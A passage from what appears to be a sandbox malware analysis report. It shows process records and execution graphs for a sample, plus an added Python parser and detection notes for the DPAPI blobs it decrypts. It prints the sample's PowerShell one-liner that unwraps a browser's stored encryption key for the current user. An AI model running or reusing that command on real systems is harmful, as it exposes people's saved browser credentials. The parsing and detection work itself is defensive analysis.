                                                                                  Commandline:powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true
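
What the two PowerShell one-liners of targets 15 and 17 actually carry is worth spelling out: the `[byte[]]@(1,0,0,0,208,140,157,223,...)` argument is a complete DPAPI blob (the output of `CryptProtectData`), and the description strings embedded in it, "Google Chrome" and "Edge", together with the preceding `chrome.exe` and `msedge.exe` version queries, match the DPAPI-wrapped key that Chromium-based browsers store as `encrypted_key` in their Local State file. The following script is an added analysis example, not code from the sample or from Joe Sandbox: it walks the blob layout (provider GUID, master key GUID, UTF-16LE description, cipher and hash identifiers, salt, HMAC key, ciphertext, signature) without decrypting anything, and runs that over constructed process-creation records that reproduce the command lines of targets 9, 15 and 17 from this report. The record format, the `triage` function and the field names in its output are the example's own assumptions.

```python
"""Added example (not code from the sample or from Joe Sandbox): parse the DPAPI blobs
inlined in this report's ProtectedData::Unprotect one-liners (targets 15 and 17)."""
import re
import struct
import uuid

# Provider GUID that CryptProtectData writes at offset 4 of every blob it produces.
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
# wincrypt.h CALG_* identifiers commonly found in DPAPI blobs.
CALG_NAMES = {0x6603: "3DES", 0x6610: "AES-256", 0x8004: "SHA-1", 0x800E: "SHA-512"}
# The call shape the sample uses: ...ProtectedData]::Unprotect([byte[]]@(1,0,0,0,...), ...
UNPROTECT_CALL = re.compile(
    r"ProtectedData\]::Unprotect\(\s*\[byte\[\]\]@\(([0-9,\s]+)\)", re.IGNORECASE)

def parse_dpapi_blob(blob: bytes) -> dict:
    """Walk the CryptProtectData blob layout and return its metadata (no decryption)."""
    off = 0
    def take(size: int) -> bytes:
        nonlocal off
        chunk = blob[off:off + size]
        if len(chunk) != size:
            raise ValueError("truncated DPAPI blob")
        off += size
        return chunk
    def u32() -> int:
        return struct.unpack("<I", take(4))[0]
    def counted() -> bytes:  # DWORD length followed by that many bytes
        return take(u32())
    version = u32()
    provider = uuid.UUID(bytes_le=take(16))
    if version != 1 or provider != DPAPI_PROVIDER:
        raise ValueError("not a DPAPI blob")
    mk_version = u32()
    master_key = uuid.UUID(bytes_le=take(16))  # names the file under %APPDATA%\Microsoft\Protect\<SID>\
    flags = u32()
    description = counted().decode("utf-16-le").rstrip("\x00")  # label chosen by the protecting app
    alg_crypt, crypt_bits, salt, _hmac_key = u32(), u32(), counted(), counted()
    alg_hash, hash_bits, hmac2_key = u32(), u32(), counted()
    ciphertext, signature = counted(), counted()
    if off != len(blob):
        raise ValueError("trailing bytes after DPAPI blob")
    return {
        "master_key_version": mk_version, "master_key_guid": str(master_key), "flags": flags,
        "description": description, "salt_len": len(salt), "hmac2_key_len": len(hmac2_key),
        "cipher": f"{CALG_NAMES.get(alg_crypt, hex(alg_crypt))}/{crypt_bits}",
        "hash": f"{CALG_NAMES.get(alg_hash, hex(alg_hash))}/{hash_bits}",
        "ciphertext_len": len(ciphertext), "signature_len": len(signature),
    }

def unprotect_calls(command_line: str) -> list:
    """Parsed blob for every Unprotect call with an inlined byte array; [] if none."""
    hits = []
    for match in UNPROTECT_CALL.finditer(command_line):
        raw = bytes(int(n) for n in match.group(1).split(","))
        hits.append(parse_dpapi_blob(raw))
    return hits

# Byte arrays copied verbatim from targets 15 and 17 of this report, split on field boundaries.
CHROME_BLOB = (
    "1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,"
    "16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,"
    "162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,"
    "65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,"
    "43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,"
    "16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,"
    "189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250"
)
EDGE_BLOB = (
    "1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,"
    "16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,"
    "177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,"
    "178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,"
    "94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,"
    "160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,"
    "96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157"
)

def sample_one_liner(byte_array: str) -> str:
    """Rebuild the sample's PowerShell command line around a byte array."""
    return (
        'powershell -Command " Add-Type -AssemblyName \\"System.Security\\"; '
        "$decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect("
        f"[byte[]]@({byte_array}), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); "
        "$decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; "
        "Write-Output $decryptedKeyString\""
    )

# Constructed process-creation records mirroring targets 9, 15 and 17 (not a real log).
RECORDS = [
    {"target": 9, "cmd": "powershell -Command \"(Get-Item 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe').VersionInfo.FileVersion\""},
    {"target": 15, "cmd": sample_one_liner(CHROME_BLOB)},
    {"target": 17, "cmd": sample_one_liner(EDGE_BLOB)},
]

def triage(records: list) -> list:
    """Flag each record that inlines a DPAPI blob and report what the blob protects."""
    return [{"target": rec["target"], **blob}
            for rec in records for blob in unprotect_calls(rec["cmd"])]
```

Two things fall out of the parse that the raw command lines do not show at a glance. Both blobs carry the same master key GUID, so DPAPI needs the same master key file from the victim's profile to unwrap either one; that is why the sample decrypts in place with `DataProtectionScope::CurrentUser` under the logged-on user instead of exfiltrating the blobs. Both also use AES-256 with SHA-512 and hold 48 bytes of ciphertext, which is what a 32-byte browser key becomes after one block of padding. Note the arrays already begin with the DPAPI version DWORD `1,0,0,0`, so the `DPAPI` text prefix that Chromium prepends to `encrypted_key` in Local State has been stripped before the call. For detection, the command line itself is the indicator: a `ProtectedData]::Unprotect` call with a multi-hundred-byte literal array is rare in legitimate administration and is captured by process-creation auditing with command-line logging (Sysmon event 1, Windows 4688) and by PowerShell script block logging (4104).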

                                                                                  Target ID:18
                                                                                  Start time:09:03:19
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true


                                                                                    Execution Graph

                                                                                    Execution Coverage:4.1%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:100%
                                                                                    Total number of Nodes:4
                                                                                    Total number of Limit Nodes:0
                                                                                    Execution graph (4 nodes): 7ffd9bab52ae -> 7ffd9bab52ca -> 7ffd9bab53c7 (calls CryptUnprotectData) -> 7ffd9bab5443

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1840293975.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 04ca9712f9fd688af1c25ae66fac980d86b07019c4c05b5f4bab1f7f5653a9b2
                                                                                    • Instruction ID: 3e21e7f80b4e5eea02b906fe32561ece0d36cc47a5c6068574c4a55a21b40f77
                                                                                    • Opcode Fuzzy Hash: 04ca9712f9fd688af1c25ae66fac980d86b07019c4c05b5f4bab1f7f5653a9b2
                                                                                    • Instruction Fuzzy Hash: 5D512971A1CA4C5FD758EB6C9C16AB97BE0FF59311F0042BEE45DC3293DE64A8018B82

                                                                                    Execution Graph

                                                                                    Execution Coverage:2.9%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:4
                                                                                    Total number of Limit Nodes:0
                                                                                    Execution graph (4 nodes): 7ffd9bad52ae -> 7ffd9bad52ca -> 7ffd9bad53c7 (calls CryptUnprotectData) -> 7ffd9bad5443

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.1936538960.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd9bad0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 4f575ef8ee0e62aee00c22dc050cb005d63ff75b8adf0af659dfa94aa7899616
                                                                                    • Instruction ID: c278cfab9d5aca69f5298c4483133ede3a583d4f579b1a161c54335a54c5a21f
                                                                                    • Opcode Fuzzy Hash: 4f575ef8ee0e62aee00c22dc050cb005d63ff75b8adf0af659dfa94aa7899616
                                                                                    • Instruction Fuzzy Hash: 1B510971A1CA8C4FD758EB6C9C166B97BE1FF99311F0042BEE44DC3292DE64A8458782